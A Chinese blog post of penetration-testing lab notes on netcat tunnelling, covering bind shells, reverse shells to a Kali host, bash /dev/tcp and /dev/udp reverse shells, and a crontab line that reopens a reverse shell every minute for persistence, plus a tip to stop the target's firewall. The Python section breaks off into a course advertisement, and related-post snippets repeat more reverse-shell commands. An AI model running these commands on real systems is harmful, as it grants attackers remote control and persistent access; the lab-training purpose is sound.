【渗透测试笔记】之【内网渗透——传输层隧道(nc的使用:nc的正反向shell、bash

于 2024-05-13 10:59:30 发布
阅读量848 收藏 28
点赞数 13
分类专栏: 程序员 文章标签: 笔记 bash 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84969915/article/details/138793430
版权

实验环境

kali(攻击机,外网地址:192.168.8.48)
Windows2012(边界服务器,外网地址:192.168.8.56,内网地址:10.1.1.10)
CentOS7(边界服务器,外网地址:192.168.8.35,内网地址:10.1.1.13)
DC(内网地址:10.1.1.2)
请添加图片描述

1 下载与部署

下载地址:https://github.com/AA8j/SecTools/tree/main/nc

或:

apt install netcat -y

2 使用方法

查看帮助:

nc -h

在这里插入图片描述

-d				// 后台模式(windows下)
-e filename		// 程序重定向
-g gateway		// 网关。设詈路由器通信网关,最多可以设詈8个。
-G num			// 设置源路由指向器的数量,为4的倍数。
-i secs			// 设置时间间隔,以便传送信息及扫描通信端口。
-l				// 使用监听模式。
-n				// 直接使用IP地址,不通过域名服务器。
-o file			// 输出文件,把往来传输的数据转换为十六进制字节码后保存在该文件中。
-p port			// 设置通信端口。
-r				// 随机指定本地与远程主机的通信端口。
-s addr			// 源地址,设詈本地主机送出数据包的IP地址。
-t				// 应答远程登录。
-u				// 使用UDP传输。
-v				// 详细输出。
-w secs			// 设置超时秒数。
-z				// 将输入输出功能关闭,只在扫描通信端口时使用。

案例:
nc -v -z 目标IP 80-200		// 指定端口扫描
nc -nv 目标IP 21				// Banner 抓取
nc -lvnp 4444				// 本地端口监听
nc -nvv 目标IP 4444			// 连接远程主机

2.1 正向shell

Windows2012(边界服务器,外网地址:192.168.8.56,内网地址:10.1.1.10)

nc -ldp 4444 -e c:\windows\system32\cmd.exe

在这里插入图片描述

CentOS7(边界服务器,外网地址:192.168.8.35,内网地址:10.1.1.13)

nc -lvp 4444 -e /bin/sh

在这里插入图片描述

kali(攻击机,外网地址:192.168.8.48)
连接windows shell:

nc 192.168.8.56 4444

在这里插入图片描述
连接CentOS Shell:

nc 192.168.8.35 5555

# 注意:出现(UNKNOWN) [192.168.8.35] 56 (?) : No route to host的情况可以关闭目标主机防火墙
systemctl stop firewalld

在这里插入图片描述

2.2 nc反弹shell

kali(攻击机,外网地址:192.168.8.48)

nc -lvnp 4444
# 监听4444和5555端口
nc -lvnp 5555

在这里插入图片描述

Windows2012(边界服务器,外网地址:192.168.8.56,内网地址:10.1.1.10)

nc -d 192.168.8.48 4444 -e c:\windows\system32\cmd.exe

在这里插入图片描述

在这里插入图片描述

CentOS7(边界服务器,外网地址:192.168.8.35,内网地址:10.1.1.13)

nc -d 192.168.8.48 5555 -e /bin/sh

在这里插入图片描述

在这里插入图片描述

2.3 其它反弹shell

2.3.1 Bash反弹shell

kali(攻击机,外网地址:192.168.8.48)

nc -lvnp 7777

在这里插入图片描述
CentOS7(边界服务器,外网地址:192.168.8.35,内网地址:10.1.1.13)

bash -i >& /dev/tcp/192.168.8.48/7777 0>&1
# TCP
bash -i >& /dev/udp/192.168.8.48/7777 0>&1
# UDP

以tcp为例:
在这里插入图片描述
在这里插入图片描述
可以写入定时任务维持权限,crontab -e编辑当前用户的任务,或者是写到计划任务目录,一般是/var/spool/cron/目录,ubuntu是/var/spool/cron/crontabs

* * * * * /bin/bash -i >& /dev/tcp/192.168.8.48/4444 0>&1
2.3.2 python反弹shell

kali(攻击机,外网地址:192.168.8.48)

nc -lvnp 8888

CentOS7(边界服务器,外网地址:192.168.8.35,内网地址:10.1.1.13)

最后

自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。

深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。

img

img

img

img

img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!

如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!

由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!

g-zFhvk5TN-1715569159074)]

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!

如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!

由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!

2401_84969915
关注
  • 13
    点赞
  • 28
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
kali使用nc正向反弹windows shell
09-12 1383
3.kali主机运行终端 并输入 nc 192.168.31.201 8888 回车后,将反弹windows系统shell到Kali终端。2.查看windows系统IP并运行ncat监听8888端口。现在可通过这个shell对windows系统进行任何操作。1.下载 ncat.exe 并上传到windows。
内网渗透笔记
dcx3291777的博客
12-08 162
net group /domain|more 查询域里的组并分页显示 net group "XXXXX" /domain 查询指定用户组成员 转载于:https://www.cnblogs.com/AirCrk/p/6144389.html
渗透测试笔记】之【内网渗透——传输层隧道nc使用nc正反shellbash(1)
最新发布
2401_84969775的博客
05-13 378
(边界服务器,外网地址:192.168.8.56,内网地址:10.1.1.10)(边界服务器,外网地址:192.168.8.35,内网地址:10.1.1.13)(边界服务器,外网地址:192.168.8.56,内网地址:10.1.1.10)(边界服务器,外网地址:192.168.8.35,内网地址:10.1.1.13)(边界服务器,外网地址:192.168.8.35,内网地址:10.1.1.13)(边界服务器,外网地址:192.168.8.35,内网地址:10.1.1.13)目录,ubuntu是。
内网渗透测试笔记
qq_44005305的博客
07-30 254
DNS**请求就会落到我们提前搭建好的恶意DNS服务器上[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-QWMwQ20G-1690337900529)(https://image.3001.net/images/20211006/1633510163_615d63137a263652da1f8.png!small)]
nc ssh 反向bash shell
hknaruto的专栏
04-25 243
nc 客户端(处于公网) nc -l -p 2222 服务端(处于内网) nc 客户端公网ip 2222 -e /bin/bash
渗透测试学习笔记之案例一.pdf
04-06
### 渗透测试学习笔记之案例一 #### 1. 前言 在渗透测试领域,持续的技术积累和实战经验分享对于个人成长至关重要。本文档记录了一个具体的渗透测试案例,旨在通过实战演练来加深对渗透测试技术的理解,并为后续的...
第十八课:红蓝对抗渗透测试31
08-03
渗透测试是一种合法的安全评估方法,用于检测网络和系统的漏洞,以增强安全性并防止黑客攻击。在本课程“第十八课:红蓝对抗渗透测试31”中,我们将探讨GreatSCT,这是一个基于metasploit payload的渗透测试工具,它...
shell脚本执行jps时:-bash: jps: command not found
01-20
在IT行业中,尤其是在管理分布式系统如Hadoop集群时,编写和使用shell脚本是一种常见的任务。这个场景中遇到的问题是,当尝试通过shell脚本来远程执行`jps`(Java Process Status)命令时,系统返回了`-bash: jps: ...
terraform:bash shell脚本的集合,用于使用Terraform自动执行各种任务
05-19
bash shell脚本的集合,用于使用自动执行各种任务。 目录 入门 什么是Terraform? Terraform是用于基础结构的开放源代码工具,可让您安全且可预测地创建,更改和改善基础结构。 此仓库中包含的工具: terraform-...
shell:Bash Shell脚本和函数库
03-08
Bash Shell脚本和功能 概述 这是实用程序脚本和帮助程序功能的集合。 您可以在bin/目录中找到脚本,并在lib/ dir中找到函数库。 有关详细信息,请检查文档。 用法 大多数脚本使用库中的函数,因此它们需要在脚本...
反向shell
m0_52011198的博客
02-20 469
反向shell是从被感染机器上发起一个连接,它提供攻击者shell访问被感染机器的权限。反向shell或者作为一个单独的恶意代码存在,或者作为一个复杂后门程序中的组件而存在。反向shell的工作方式是远程计算机将自己的shell发送给特定的用户,而不是将shell绑定到一个端口上。后者在很多环境中是无法访问的。这样,你就可以对远程服务器执行root命令。
内网渗透nc反弹shell总结
安全大白
01-03 6483
1、实验环境 Kali:192.168.32.132 //模拟靶机 Windows:192.168.32.1 //模拟公网vps 2、若靶机上存在nc,获取反向shell: vps攻击机:nc -lvp 9999 // 监听9999端口 靶机:nc 1.1.1.1 9999 -e /bin/bash // Linux正向连接公网vps1.1.1.1的9999端口 nc 1.1.1.1 9999 -e c:\windows\system32\cmd.exe // Windows 3、若
web渗透【12】nc 反弹shell
司徒荆的博客
06-14 544
web渗透【12】nc 反弹shell
NC反弹shell的几种方法
qq_59350385的博客
05-12 9684
假如ubuntu、CentOS为目标服务器系统 kali为攻击者的系统,ip为:192.168.0.4,开放7777端口且没被占用 最终是将ubuntu、CentOS的shell反弹到kali上 正向反弹shell ubuntu或者CentOS上面输入 nc -lvp 7777 -e /bin/bash kali上输入 nc ip 7777 正向反弹是目标机先执行nc命令,然后kali上再进行nc监听,即可反弹shell。 需要目标机安装nc反向反弹shell 方法1:bash
NC工具—文件传输&shell获取功能
weixin_44431280的博客
04-03 6742
NC工具—文件传输&shell获取功能 前言:此文主要对NC(NETCAT)工具的文件传输和SHELL获取功能进行学习记录,不对工具简介和基本功能进行赘述,可参考我的另一篇文章Web安全工具—nc(瑞士军刀)持续更新 基础知识: 1,文件传输基础知识:linux下的输入重定向"<“和输出重定向”>"介绍 输入重定向: ...
黑客零基础第一章--反向shell
ShadowBlade
08-09 4915
一篇文章叫你完全掌握反向shell
正向shell和反弹shell
weixin_45936149的博客
03-26 9486
正向shell反弹shell的利用场景以及使用技巧
webshellnc反向连接获得cmd shell的方法
whjtoby的专栏
06-16 2858
在webshell里操作CMD很不爽,直接上传一个nc,打入以下命令:nc -vv 你的IP地址 8000 -e cmd.exe然后在本机用nc监听一个端口,命令如下:nc -vv -l -p 8000稍微等下,就会连接一个shell了.补充:以上只是示范命令,实际操作如在海洋2006里的WScript.Shell程序运行器中,一定要输入nc的绝对路径!例子:路径:E:/wwwroot/www/c
rpm 安装ncbash: nc: command not found
07-28
回答: 当你在安装完nc后,出现"bash: nc: command not found"的错误提示时,可能是因为nc命令没有被正确地添加到系统的环境变量中。你可以尝试以下解决方案来解决这个问题。首先,你可以尝试执行以下命令来查看nc命令的安装路径:echo $PATH。如果你没有看到nc命令的安装路径,那么你可以尝试执行以下命令来添加nc命令的路径到系统的环境变量中:export PATH=$PATH:/usr/bin。这样,你就可以在任何位置使用nc命令了。如果以上方法没有解决你的问题,你可以尝试重新安装nc命令,或者使用其他方法来安装nc命令。希望这些解决方案能够帮助到你。\[1\] #### 引用[.reference_title] - *1* [解决 -bash: nc: command not found](https://blog.csdn.net/suixinfeixiangfei/article/details/122850642)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down1,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [linux解决bash: nc: command not found 安装nc、telnet、yum](https://blog.csdn.net/fenglongmiao/article/details/79272708)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值